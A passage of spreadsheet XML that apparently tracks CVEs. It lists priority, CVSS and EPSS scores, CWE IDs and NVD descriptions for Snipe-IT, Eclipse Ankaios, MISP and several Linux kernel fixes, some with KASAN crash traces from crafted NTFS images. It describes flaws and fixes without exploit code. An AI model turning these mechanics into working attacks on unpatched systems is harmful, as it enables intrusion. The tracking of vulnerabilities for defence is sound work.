      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.6.2 contain an authorization bypass vulnerability in checkout-acceptance report actions when Full Multiple Company Support is enabled. Authenticated users with reports.view permission can enumerate sequential acceptance IDs and soft-delete or trigger reminder emails for acceptances belonging to other companies by exploiting a null check on the legacy users.company_id column.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85616</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86836</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-367, CWE-379</t>
        </is>
      </c>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ankaios versions 0.1.0 through 1.0.2, the agent creates workload files and Control Interface named pipes (FIFOs) under a predictable path derived from the agent name and a hash of the workload's runtime configuration. If a directory or FIFO already exists at that path when the agent (re)starts, the agent reuses it based only on an existence and/or file-type check, without validating its owner or permissions. A local, unprivileged user with write access to the same base directory (by default under `$TMPDIR/ankaios`, e.g. shared `/tmp`) can pre-create this path hierarchy, including the two Control Interface FIFOs, before the agent starts. The agent then treats the attacker-owned FIFOs as the legitimate Control Interface for the targeted workload. The attacker can complete the Control Interface handshake and issue requests using that workload's configured `controlInterfaceAccess` permissions, allowing impersonation of the workload and, depending on its configured permissions, unauthorized reading and/or modification of the cluster's desired state.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86836</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89781</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix out-of-bounds read in read_log_rec_buf()
read_log_rec_buf() copies a log record into a caller buffer starting at
	u32 off = lsn_to_page_off(log, lsn) + log-&gt;record_header_len;
log-&gt;record_header_len (and log-&gt;data_off, used for the following pages)
comes verbatim from the on-disk restart area and is only checked for
8-byte alignment in is_rst_area_valid(), so off can exceed
log-&gt;page_size. "tail = log-&gt;page_size - off" then underflows and
memcpy() reads past the page_size-sized buffer returned by
read_log_page(), spilling adjacent slab memory into the replay buffer.
This is reachable by mounting a crafted NTFS image:
 BUG: KASAN: slab-out-of-bounds in read_log_rec_buf+0x216/0x580
 Read of size 64 at addr ffff88800a877ff8 by task exploit/127
  read_log_rec_buf fs/ntfs3/fslog.c:2299
  log_replay fs/ntfs3/fslog.c:4216
  ntfs_loadlog_and_replay fs/ntfs3/fsntfs.c:324
  ntfs_fill_super fs/ntfs3/super.c:1392
  get_tree_bdev_flags fs/super.c:1694
  __x64_sys_mount fs/namespace.c:4360
 The buggy address is located 4088 bytes to the right of
 the 4096-byte region [ffff88800a876000, ffff88800a877000)
Reject an in-page offset outside the current page before the copy.
[almaz.alexandrovich@paragon-software.com: replaced the &gt;= sign with &gt;]</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89781</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89782</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: reject restart table growth beyond U16_MAX entries
During $LogFile replay, log_replay() indexes the transaction table by the
transact_id taken from the log record header.  check_log_rec() only
verifies that transact_id is non-zero and properly aligned, not its
magnitude, so a crafted image can request an arbitrarily large index.
alloc_rsttbl_from_idx() grows the table to cover that index via
extend_rsttbl(), which passes the new entry count to init_rsttbl():
	rt = init_rsttbl(esize, used + add);
used + add is computed as u32 but init_rsttbl() takes a u16, and the
count is stored in struct RESTART_TABLE as a __le16.  When used + add
exceeds U16_MAX it is truncated, init_rsttbl() allocates a table far
smaller than the index requires, and alloc_rsttbl_from_idx() then
dereferences and writes at the original, untruncated offset -- an
out-of-bounds access past the allocation, reachable by mounting a
crafted NTFS image.
 BUG: KASAN: use-after-free in alloc_rsttbl_from_idx (fs/ntfs3/fslog.c:950)
 Read of size 4 at addr ffff8880327ffff8 by task exploit
  alloc_rsttbl_from_idx (fs/ntfs3/fslog.c:950)
  log_replay (fs/ntfs3/fslog.c:4562)
  ntfs_loadlog_and_replay (fs/ntfs3/fsntfs.c:324)
  ntfs_fill_super (fs/ntfs3/super.c:1393)
  get_tree_bdev_flags
  vfs_get_tree
  path_mount
  __x64_sys_mount
A restart table is limited to U16_MAX entries by its __le16 count, so a
larger growth request is invalid input.  Reject it in extend_rsttbl();
all callers already handle a NULL return.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89782</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89795</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: Allow per function PCI slots to fix slot reset on s390
On s390 systems, which use a machine level hypervisor, PCI devices are
always accessed through a form of PCI pass-through which fundamentally
operates on a per PCI function granularity. This is also reflected in the
s390 PCI hotplug driver which creates hotplug slots for individual PCI
functions. Its reset_slot() function, which is a wrapper for
zpci_hot_reset_device(), thus also resets individual functions.
Currently, the pci_create_slot() assigns the same pci_slot object to
multifunction devices. This approach worked fine on s390 systems that only
exposed virtual functions as individual PCI domains to the operating
system.  Since commit 44510d6fa0c0 ("s390/pci: Handling multifunctions")
s390 supports exposing the topology of multifunction PCI devices by
grouping them in a shared PCI domain. This creates a problem when resetting
a function through the hotplug driver's slot_reset() interface.
When attempting to reset a function through the hotplug driver, the shared
slot assignment causes the wrong function to be reset instead of the
intended one. It also leaks memory as we do create a pci_slot object for
the function, but don't correctly free it in pci_slot_release().
Add a flag for struct pci_slot to allow per function PCI slots for
functions managed through a hypervisor, which exposes individual PCI
functions while retaining the topology. Since we can use all 8 bits for
slot 'number' (for ARI devices), change slot 'number' u16 to account for
special values PCI_SLOT_PLACEHOLDER and PCI_SLOT_ALL_DEVICES.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89795</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89806</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/sysfb: ofdrm: Fix integer overflow in fb_size calculation
The framebuffer size calculation `fb_size = linebytes * height` can
overflow when both values are large (e.g., 46341 * 46341 &gt; INT_MAX).
Since linebytes and height are both int types, the multiplication is
performed as int * int, which results in undefined behavior on overflow.
Use check_mul_overflow() to detect and prevent this overflow, consistent
with the approach used in simpledrm.c and corebootdrm.c.</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89806</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89856</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Clamp MSI-X derived queue counts to avoid truncation
ha-&gt;msix_count is u16, but ha-&gt;max_req_queues, ha-&gt;max_rsp_queues and
ha-&gt;max_qpairs are u8. Deriving the queue count as
"ha-&gt;max_req_queues = ha-&gt;msix_count - 1" therefore truncates: a board
(or a misconfigured/malicious hot-plugged device) advertising 257 MSI-X
vectors yields msix_count - 1 == 256, which truncates to 0. An MSI-X
count of 1 zeroes it as well, and in target mode the subsequent
"ha-&gt;max_req_queues--" then underflows 0 to 255.
When the count is 0, qla2x00_alloc_queues() calls
kzalloc_objs(struct req_que *, 0), which returns ZERO_SIZE_PTR. That is
not NULL, so the allocation check passes and the following
"ha-&gt;req_q_map[0] = req" dereferences ZERO_SIZE_PTR, corrupting memory
or crashing the kernel.
Add qla_calc_queue_count() to clamp the derived value into
[1, QLA_MAX_QUEUES - 1] so it always fits in u8 and is never zero, and
use it at all three derivation sites (qla25xx_iospace_config(),
qla83xx_iospace_config() and qla24xx_enable_msix()). Also guard the
target-mode decrement so it cannot reintroduce a zero (which would in
turn underflow max_qpairs).</t>
        </is>
      </c>
      <c r="S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89856</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89877</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: saa7164: fix cleanup on resource allocation failure
saa7164_dev_setup() adds the device to the global saa7164_devlist before
requesting the PCI BAR memory regions.
If get_resources() fails, saa7164_dev_setup() decrements the device count
and returns an error, but leaves the device on saa7164_devlist. The probe
error path then frees the device, leaving a dangling entry on the global
list.
Reuse the existing MMIO mapping error path to remove the device from
saa7164_devlist and decrement the device count before returning.
Also release BAR0 if it was successfully requested but the BAR2 request
fails.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89877</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89885</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: platform: mtk-mdp3: Fix SCP device refcounting
mdp_probe() first tries to get the SCP handle with scp_get(). When that
fails, it falls back to looking up the SCP platform device with
__get_pdev_by_id() and then reads its driver data.
The fallback lookup returns the platform device with a reference, just
like scp_get() does. However, the fallback path currently drops that
reference immediately after platform_get_drvdata(). The driver later
still calls scp_put(mdp-&gt;scp) unconditionally from the probe error path
and from mdp_video_device_release(), which drops the SCP device
reference again.
Keep the fallback reference until the existing scp_put() call, so that
the fallback path follows the same ownership rules as the scp_get()
path.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89885</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89904</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: Fix acpi_package_ids[] array overflow
With LoongArch virt machine, a typical setting is one core per socket,
there will max 256 sockets (packages) on one VM. With PPTT acpi table,
array acpi_package_ids[] will be overflowed.
Here change the array size of acpi_package_ids[] with the max value of
MAX_PACKAGES and KVM_MAX_VCPUS.</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89904</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89943</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: loongson: Fix error handling in ACPI property parsing
In loongson_card_parse_acpi(), the return value of
device_property_read_string() for the `codec-dai-name` property was
ignored. If the property is missing or invalid, an uninitialized pointer
would be used later, potentially leading to undefined behavior.
Fix this by checking the return value and propagating the error
appropriately.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89943</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89980</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: harmony: initialize locks before requesting IRQ
snd_harmony_create() registers the IRQ before initializing h-&gt;lock and
h-&gt;mixer_lock. A pending interrupt can invoke the handler while these
locks are uninitialized.
Initialize both locks before requesting the IRQ so the handler always
sees valid lock state.</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89980</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89992</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpuidle: dt_idle_genpd: kfree() the original name allocation
dt_idle_pd_alloc() kasprintf()s the full node path, then points
pd-&gt;name at kbasename() of that string. dt_idle_pd_free() kfree()s
pd-&gt;name, which is no longer the start of the allocation.
Copy the basename instead.</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89992</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90895</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-200, CWE-522, CWE-862</t>
        </is>
      </c>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP’s interactive CLI shell implement access control independently from the normal web application, causing several authorization inconsistencies.
The patch shows that CLI access could differ from the web application in multiple security-sensitive areas:
 - feed listings did not enforce the same lookup_visible restrictions for non-host-organisation users;
 - feed detail access did not enforce the same host-organisation/site-admin authorization as FeedsController::view();
 - Feed.headers, which can contain HTTP authorization credentials, could be exposed instead of being hidden or masked;
 - server synchronization authkey values were not explicitly hidden from CLI detail output;
 - sharing-group detail access did not consistently use SharingGroup::checkIfAuthorised();
 - the use command could establish context for a record without first proving that the user was authorized to view that record
The commit additionally hardens pagination and terminal rendering, including neutralization of terminal control sequences found in database-backed values. Those are important hardening changes, but the main vulnerability is the CLI authorization/data-disclosure mismatch.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90895</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91102</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
